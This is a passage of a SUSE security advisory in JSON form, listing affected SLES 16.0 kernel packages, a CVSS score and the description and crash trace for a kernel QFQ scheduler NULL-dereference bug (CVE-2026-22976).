"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71163"
},
{
"cve": "CVE-2026-22976",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22976"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset\n\n`qfq_class-\u003eleaf_qdisc-\u003eq.qlen \u003e 0` does not imply that the class\nitself is active.\n\nTwo qfq_class objects may point to the same leaf_qdisc. This happens\nwhen:\n\n1. one QFQ qdisc is attached to the dev as the root qdisc, and\n\n2. another QFQ qdisc is temporarily referenced (e.g., via qdisc_get()\n/ qdisc_put()) and is pending to be destroyed, as in function\ntc_new_tfilter.\n\nWhen packets are enqueued through the root QFQ qdisc, the shared\nleaf_qdisc-\u003eq.qlen increases. At the same time, the second QFQ\nqdisc triggers qdisc_put and qdisc_destroy: the qdisc enters\nqfq_reset() with its own q-\u003eq.qlen == 0, but its class\u0027s leaf\nqdisc-\u003eq.qlen \u003e 0. Therefore, the qfq_reset would wrongly deactivate\nan inactive aggregate and trigger a null-deref in qfq_deactivate_agg:\n\n[ 0.903172] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[ 0.903571] #PF: supervisor write access in kernel mode\n[ 0.903860] #PF: error_code(0x0002) - not-present page\n[ 0.904177] PGD 10299b067 P4D 10299b067 PUD 10299c067 PMD 0\n[ 0.904502] Oops: Oops: 0002 [#1] SMP NOPTI\n[ 0.904737] CPU: 0 UID: 0 PID: 135 Comm: exploit Not tainted 6.19.0-rc3+ #2 NONE\n[ 0.905157] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014\n[ 0.905754] RIP: 0010:qfq_deactivate_agg (include/linux/list.h:992 (discriminator 2) include/linux/list.h:1006 (discriminator 2) net/sched/sch_qfq.c:1367 (discriminator 2) net/sched/sch_qfq.c:1393 (discriminator 2))\n[ 0.906046] Code: 0f 84 4d 01 00 00 48 89 70 18 8b 4b 10 48 c7 c2 ff ff ff ff 48 8b 78 08 48 d3 e2 48 21 f2 48 2b 13 48 8b 30 48 d3 ea 8b 4b 18 0\n\nCode starting with the faulting instruction\n===========================================\n 0:\t0f 84 4d 01 00 00 \tje 0x153\n 6:\t48 89 70 18 \tmov %rsi,0x18(%rax)\n a:\t8b 4b 10 \tmov 0x10(%rbx),%ecx\n d:\t48 c7 c2 ff ff ff ff \tmov $0xffffffffffffffff,%rdx\n 14:\t48 8b 78 08 \tmov 0x8(%rax),%rdi\n 18:\t48 d3 e2 \tshl %cl,%rdx\n 1b:\t48 21 f2 \tand %rsi,%rdx\n 1e:\t48 2b 13 \tsub (%rbx),%rdx\n 21:\t48 8b 30 \tmov (%rax),%rsi\n 24:\t48 d3 ea \tshr %cl,%rdx\n 27:\t8b 4b 18 \tmov 0x18(%rbx),%ecx\n\t...\n[ 0.907095] RSP: 0018:ffffc900004a39a0 EFLAGS: 00010246\n[ 0.907368] RAX: ffff8881043a0880 RBX: ffff888102953340 RCX: 0000000000000000\n[ 0.907723] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000\n[ 0.908100] RBP: ffff888102952180 R08: 0000000000000000 R09: 0000000000000000\n[ 0.908451] R10: ffff8881043a0000 R11: 0000000000000000 R12: ffff888102952000\n[ 0.908804] R13: ffff888102952180 R14: ffff8881043a0ad8 R15: ffff8881043a0880\n[ 0.909179] FS: 000000002a1a0380(0000) GS:ffff888196d8d000(0000) knlGS:0000000000000000\n[ 0.909572] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 0.909857] CR2: 0000000000000000 CR3: 0000000102993002 CR4: 0000000000772ef0\n[ 0.910247] PKRU: 55555554\n[ 0.910391] Call Trace:\n[ 0.910527] \u003cTASK\u003e\n[ 0.910638] qfq_reset_qdisc (net/sched/sch_qfq.c:357 net/sched/sch_qfq.c:1485)\n[ 0.910826] qdisc_reset (include/linux/skbuff.h:2195 include/linux/skbuff.h:2501 include/linux/skbuff.h:3424 include/linux/skbuff.h:3430 net/sched/sch_generic.c:1036)\n[ 0.911040] __qdisc_destroy (net/sched/sch_generic.c:1076)\n[ 0.911236] tc_new_tfilter (net/sched/cls_api.c:2447)\n[ 0.911447] rtnetlink_rcv_msg (net/core/rtnetlink.c:6958)\n[ 0.911663] ? __pfx_rtnetlink_rcv_msg (net/core/rtnetlink.c:6861)\n[ 0.911894] netlink_rcv_skb (net/netlink/af_netlink.c:2550)\n[ 0.912100] netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344)\n[ 0.912296] ? __alloc_skb (net/core/skbuff.c:706)\n[ 0.912484] netlink_sendmsg (net/netlink/af\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
